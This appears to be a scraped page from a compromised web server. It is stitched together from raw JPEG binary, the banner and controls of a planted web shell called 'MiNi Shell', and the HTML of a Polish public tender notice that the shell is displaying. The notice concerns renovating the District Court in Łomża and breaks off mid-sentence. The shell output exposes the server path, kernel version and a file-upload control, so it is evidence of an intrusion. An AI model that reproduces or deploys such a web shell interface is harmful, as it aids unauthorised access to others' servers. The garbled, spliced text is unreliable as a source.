JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210528/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210528/0006796801-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00067968 z dnia 2021-05-28</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Remont budynku głównego Sądu Okręgowego w Łomży – Etap II – remont II piętra oraz ocieplenie stropu ostatniej kondygnacji – II postępowanie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Sąd Okręgowy w Łomży</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 57063100000000</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Dworna 16</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Łomża</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">18-400</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podlaskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL842 - Łomżyński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">862154273</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">gospod@lomza.so.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.lomza.so.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - organ władzy publicznej - organ kontroli państwowej i ochrony prawa oraz sąd i trybunał</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Porządek i bezpieczeństwo publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Remont budynku głównego Sądu Okręgowego w Łomży – Etap II – remont II piętra oraz ocieplenie stropu ostatniej kondygnacji – II postępowanie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-6da429e1-bf86-11eb-911f-9ad5f74c2a25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00067968</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-05-28</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00011472/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Remont II piętra oraz ocieplenie stropu ostatniej kondygnacji budynku głównego Sądu Okręgowego w Łomży</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.ms.gov.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.ms.gov.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.System<br/>jest dostępny pod adresem: https://ezamowienia.ms.qov.pl2. Korzystanie z Systemu możliwe jest pod warunkiem spełnienia przez sprzęt, z którego korzystają użytkownicy Wykonawcy minimalnych<br/>wymagań technicznych i specyfiki połączenia, tj. posiadanie komputera o parametrach umożliwiających zainstalowanie następującego <br/>oprogramowania:2.1 Przeglądarka internetowa: Firefox ver. 65 i<br/>późniejsze, Chrome ver. 66 i późniejsze, Opera ver. 58 i późniejsze, Microsoft Edge ver 18 i późniejsze, Internet Explorer 11. Przeglądarki zalecane: Google Chrome, Mozilla Firefox, Opera.2.2 Oprogramowanie Java ver. min 1.8 jre.2.3 Program Acrobat Reader lub inny umożliwiający obsługę<br/>formatów pdf. Instrukcje instalowania oprogramowania znajdują się w Systemie w zakładce Elearning. 2.4 Oprogramowanie SzafirHost w systemie operacyjnym Instrukcja instalowania oprogramowania znajduje się w Systemie w zakładce E-learning.3.Zamawiający dopuszcza komunikację za pomocą poczty elektronicznej na adres: gospod@lomza.so.gov.pl (nie dotyczy składania ofert oraz załączników do oferty) w szczególnych sytuacjach tj. awarii, błędów lub niedostępności Systemu uniemożliwiających komunikację Wykonawcy i Zamawiającego poprzez<br/>System. Jeżeli Zamawiający lub wykonawca przekazują oświadczenia, wnioski, zawiadomienia oraz informacje za pośrednictwem poczty elektronicznej, każda ze stron na żądanie drugiej strony niezwłocznie potwierdza fakt ich otrzymania.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Na podstawie art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych), informuję, że:<br/>1.	Administratorem Pani/Pana danych osobowych jest Sąd Okręgowy w Łomży, ul. Dworna 16, 18-400 Łomża, reprezentowany przez Dyrektora Sądu Okręgowego w Łomży.<br/>2.	W sprawach związanych z ochroną danych osobowych można kontaktować się z Inspektorem Ochrony Danych za pośrednictwem adresu e-mail: iod@lomza.so.gov.pl <br/>3.	Celem przetwarzania Pani/Pana danych osobowych jest postępowanie o udzielenie zamówienia publicznego, pn. „Remont budynku głównego Sądu Okręgowego w Łomży – Etap II – remont II piętra oraz ocieplenie stropu ostatniej kondygnacji – II postępowanie” – DSO-226-5/21 na podstawie art. 6 ust. 1 lit. c ogólnego rozporządzenia o ochronie danych oraz ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych.<br/>4.	Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ust. 1 ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych. <br/>5.	Pani/Pana dane osobowe będą przechowywane przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, zgodnie z art. 78 ust. 1 ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych.<br/>6.	Przysługuje Pani/Panu prawo do:<br/>6.1.	dostępu do swoich danych (art. 15 RODO), w przypadku gdy wykonanie tego obowiązku wymagałoby niewspółmiernie dużego wysiłku, zamawiający może żądać od osoby, której dane dotyczą wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego,<br/>6.2.	sprostowania swoich danych (art. 16 RODO), skorzystanie przez osobę, której te dane dotyczą, z uprawnienia do sprostowania lub uzupełnienia danych osobowych, nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego lub konkursu ani zmianą postanowień umowy w zakresie niezgodnym z ustawą, <br/>6.3.	ograniczenia przetwarzania danych (art. 18 RODO), wystąpienie z takim żądaniem nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania <br/>o udzielenie zamówienia publicznego,<br/>6.4.	wniesienie skargi do organu nadzorczego Prezesa Urzędu Ochrony Danych, ul. Stawki 2, 00-193 Warszawa, gdy uzna Pani/Pan, że przetwarzanie danych osobowych dotyczących Pani/Pana narusza przepisy prawa.<br/>7.	Podanie Pani/Pana danych osobowych jest wymogiem ustawowym, określonym w przepisach ustawy Prawo zamówień publicznych, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego. Konsekwencje niepodania określonych danych wynikają z ustawy Pzp.<br/>7.1.	Pani/Pana dane osobowe nie będą przekazywane do państwa trzeciego i organizacji międzynarodowej.<br/>7.2.	Pana/Pani dane osobowe nie będą przetwarzane w sposób zautomatyzowany, w tym w formie profilowania.<br/>7.3.	Pani/Pana dane osobowe nie będą przetwarzane w innym celu, niż postępowanie o udzielenie zamówienia publicznego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DSO-226-5/21</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 856029,25 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest wykonanie remontu II piętra budynku głównego Sądu Okręgowego w Łomży przy ul. Dwornej 16 zgodnie z:<br/>1.1 Dokumentacją projektową „Remont budynku Sądu Okręgowego w Łomży” branża architektoniczna autor mgr inż. arch. Andrzej Popławski. Załącznik nr 6 SWZ.<br/>1.2 Projektem wykonawczym prac dodatkowych na II piętrze polegających na wymianie posadzek w pokojach nr 30, 37, 38, 39, 40, 41, 42, sali rozpraw nr 4 i dwóch łazienkach opracowanym przez Biuro Projektowo-Kosztorysowe Sławomir Daniszewski. Załącznik nr 7 do SWZ.<br/>1.3 Projektem budowlany „Remont Instalacji Elektrycznych Sądu Okręgowego w Łomży branża instalacje elektryczne, autor mgr. inż. Wojciech Grudziński. Załącznik nr 8 do SWZ.<br/>1.4 Projektem wykonawczy „Remont Instalacji Elektrycznej Budynku Sądu Okręgowego w Łomży, autor mgr. inż. Wojciech Grudziński. Załącznik nr 9 do SWZ.<br/>1.5 Przedmiarem robót „Remont Sądu Okręgowego w Łomży – II piętro (branża architektoniczna i elektryczna)”. Załącznik nr 11 do SWZ.<br/>1.6 Przedmiarem robót „Remont Sądu Okręgowego w Łomży – II piętro – roboty dodatkowe”. Załącznik nr 12 do SWZ.<br/>1.7 Specyfikacją Techniczna Wykonania i Odbioru Robót – II piętro (branża architektoniczna i elektryczna). Załącznik nr 14 do SWZ.<br/>2. Przedmiotem zamówienia jest wykonanie ocieplenia stropu ostatniej kondygnacji budynku głównego Sądu Okręgowego w Łomży przy ul. Dwornej 16 zgodnie z:<br/>2.1 Projektem wykonawczym prac dodatkowych - ocieplenia stropu ostatniej kondygnacji opracowanym przez Biuro Projektowo-Kosztorysowe Sławomir Daniszewski. Załącznik nr 10 do SWZ.<br/>2.2 Przedmiarem robót „Remont Sądu Okręgowego w Łomży – docieplenie stropu ostatniej kondygnacji”. Załącznik nr 13 do SWZ.<br/>2.3 Specyfikacją Techniczna Wykonania i Odbioru Robót – „Remont Sądu Okręgowego w Łomży – docieplenie stropu ostatniej kondygnacji”. Załącznik nr 15 do SWZ.<br/>3. Na realizację przedmiotu zamówienia Sąd Okręgowy w Łomży posiada : <br/>3.1 Decyzję NR 2/20 Prezydenta Miasta Łomża z dnia 09.01.2020 r. zatwierdzającą projekt budowlany i udzielenia pozwolenia na remont budynku Sądu Okręgowego w Łomży. Załącznik nr 16 do SWZ.<br/>3.2 Pozwolenie Ł.5142.73.2019.ET Podlaskiego Wojewódzkiego Konserwatora Zabytków na prowadzenie robót budowlanych w zabytku. Załącznik nr 17 do SWZ.<br/>4. Przeniesienie wyposażenia biurowego i mebli znajdujących się na II piętrze budynku głównego Sądu Okręgowego w Łomży, w pomieszczeniach nr 30, 36, 37, 38, 39, 40, 41, 42, Sali rozpraw nr 4 i korytarzy II pietra do pomieszczeń znajdujących się w budynku Sądu Okręgowego w Łomży przy ul. Dwornej 14 oraz ponowne przeniesienie wyposażenia biurowego i mebli do pomieszczeń z których zostały wyniesione, po zakończeniu robót remontowych. Szczegółowy wykaz ilości mebli oraz wyposażenia z uwzględnieniem miejsca wraz z poziomem kondygnacji miejsca składowania na czas remontu zawiera załącznik nr 18 do SWZ. Uwaga: za powstałe z winy Wykonawcy ewentualne uszkodzenia mebli, wyposażenia, sprzętu, wynikłe podczas przemieszczania odpowiada Wykonawca, a ewentualne naprawy pokryje we własnym zakresie.<br/>5. Po zakończeniu robót remontowych, wniesieniu mebli i wyposażenia, wszystkie pomieszczenia, teren zewnętrzy, miejsce ustawienia sprzętu oraz składowania materiałów mają być posprzątane, przygotowane do użytkowania.<br/>6. Nazwa i kod zamówienia wg Wspólnego Słownika Zamówień (CPV):<br/>6.1 45453000-7 Roboty remontowe i renowacyjne,<br/>6.2 45310000-3 Roboty instalacyjne elektryczne,<br/>6.3 45421100-5 Instalowanie drzwi, okien i podobnych elementów,<br/>6.4 45321000-3 Izolacja cieplna. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45453000-7 - Roboty remontowe i renowacyjne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45321000-3 - Izolacja cieplna</p> <p class="mb-0">45421100-5 - Instalowanie drzwi i okien, i podobnych elementów</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">110 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty Zamawiający będzie kierował się<br/>niżej podanym kryterium i jego wagą:<br/>1.Najniższa cena brutto – 70 %, <br/>2.Okres gwarancji – 30 %.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">70</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielnie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają niżej określone warunki<br/>udziału w postępowaniu, dotyczące:1. Zdolności do występowania w obrocie gospodarczym –<br/>Zamawiający nie wymaga spełnienia warunku w sposób szczególny.2. Uprawnień do<br/>prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych<br/>przepisów - warunek zostanie spełniony jeżeli Wykonawca wykaże, że:2.1 dysponuje osobą<br/>która będzie pełnić funkcję kierownika budowy, osoba ta powinna posiadać uprawnienia<br/>budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej<br/>zgodnie z ustawą z dnia 7 lipca 1994 r. Prawo budowlane (t. j. Dz. U. z 2020 r., poz. 1333 z<br/>późn. zm.) oraz rozporządzeniem Ministra Transportu i Budownictwa w sprawie samodzielnych<br/>funkcji technicznych w budownictwie lub odpowiadające im ważne uprawnienia budowlane, które<br/>zostały wydane na podstawie wcześniej obowiązujących przepisów. Zgodnie z art. 12a ustawy<br/>Prawo budowlane samodzielne funkcje techniczne w budownictwie, określone w art. 12 ust. 1<br/>ustawy mogą również wykonywać osoby, których odpowiednie kwalifikacje zawodowe zostały<br/>uznane na zasadach określonych w przepisach odrębnych. Regulację odrębną stanowią<br/>przepisy ustawy z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych<br/>nabytych w państwach członkowskich Unii Europejskiej (t. j. Dz. U. z 2019 r., poz. 2272 z późń. zm.) oraz posiada kwalifikacje o których mowa w art. 37c ustawy z dnia 23 lipca 220 r. o<br/>ochronie zabytków (Dz. U. z 2020 r. poz. 282 z późn. zm.) Kierownik budowy musi być<br/>członkiem Izby Inżynierów Budownictwa.2.2 warunek zostanie spełniony jeżeli Wykonawca<br/>wykaże, że dysponuje osobą która będzie pełnić funkcję kierownika robót, osoba ta powinna<br/>posiadać uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w<br/>specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i<br/>elektroenergetycznych lub równoważne im uprawnienia w tej specjalności, zgodniez ustawą z<br/>dnia 7 lipca 1994 r. Prawo budowlane (t.j. Dz. U. z 2020 r., poz. 1333 z późn. zm.) oraz<br/>rozporządzeniem Ministra Transportu i Budownictwa w sprawie samodzielnych funkcji<br/>technicznych w budownictwie lub odpowiadające im ważne uprawnienia budowlane, które<br/>zostały wydane na podstawie wcześniej obowiązujących przepisów. Zgodnie z art. 12a ustawy<br/>Prawo budowlane samodzielne funkcje techniczne w budownictwie, określone w art. 12 ust. 1<br/>ustawy mogą również wykonywać osoby, których odpowiednie kwalifikacje zawodowe zostały<br/>uznane na zasadach określonych w przepisach odrębnych. Regulację odrębną stanowią<br/>przepisy ustawy z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych<br/>nabytych w państwach członkowskich Unii Europejskiej (t. j. Dz. U. z 2019 r., poz. 2272 z późn.<br/>zm.). Kierownik robót elektrycznych musi być członkiem Izby Inżynierów Budownictwa.3. sytuacji<br/>ekonomicznej lub finansowej – warunek ten będzie spełniony przez Wykonawcę, jeżeli<br/>Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej<br/>działalności gospodarczej na kwotę nie mniejszą niż 500 000 złotych.4. zdolności technicznej i<br/>zawodowej – warunek ten będzie spełniony przez Wykonawcę jeżeli Wykonawca wykaże, że w<br/>okresie ostatnich pięciu lat przed upływem terminu składania ofert wykonał należycie co najmniej<br/>dwie roboty budowlane polegające na remoncie budynków użyteczności publicznej o wartości<br/>400 000 złotych brutto każda. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1.	Wraz z ofertą Wykonawca składa aktualne na dzień składania ofert oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu - Wzór oświadczenia zgodnie z załącznikiem nr 2 do SWZ. Od Wykonawców składających ofertę wspólną, Zamawiający żąda złożenia oświadczeń osobno dla każdego z Wykonawców. Oświadczenie stanowi dowód potwierdzający brak podstaw wykluczenia i spełniania warunków udziału w postępowaniu na dzień składania ofert, tymczasowo zastępujący wymagane przez Zamawiającego środki dowodowe. Oświadczenie wraz z ofertą winny zostać złożone, pod rygorem nieważności w formie elektronicznej lub w postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym lub podpisem zaufanym lub podpisem osobistym.<br/>2. Wykonawcę, którego oferta<br/>została oceniona najwyżej, Zamawiający wezwie do złożenia w terminie nie krótszym niż 5 dni,<br/>aktualnych na dzień składania, niżej wymienionych podmiotowych środków dowodowych:2.1<br/>zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że Wykonawca nie zalega<br/>z opłaceniem podatków i opłat, w zakresie art. 109 ust. 1 pkt 1 ustawy PZP, wystawionego nie<br/>wcześniej niż 3 miesiące przed jego złożeniem a w przypadku zalegania z opłacaniem podatków lub<br/>opłat wraz z zaświadczeniem Zamawiający żąda złożenia dokumentów potwierdzających, że<br/>odpowiednio przed upływem terminu składania ofert Wykonawca dokonał płatności należnych<br/>podatków lub opłat wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat<br/>tych należności,2.2 zaświadczenia albo innego dokumentu właściwej terenowej jednostki<br/>organizacyjnej Zakładu Ubezpieczeń Społecznych lub właściwej placówki terenowej Kasy Rolniczego<br/>Ubezpieczenia Społecznego potwierdzającego, że Wykonawca nie zalega z opłacaniem składek na<br/>ubezpieczenia społeczne i zdrowotne, w zakresie art. 109 ust. 1 pkt 1 ustawy PZP, wystawionego nie<br/>wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem składek na<br/>ubezpieczenia społeczne lub 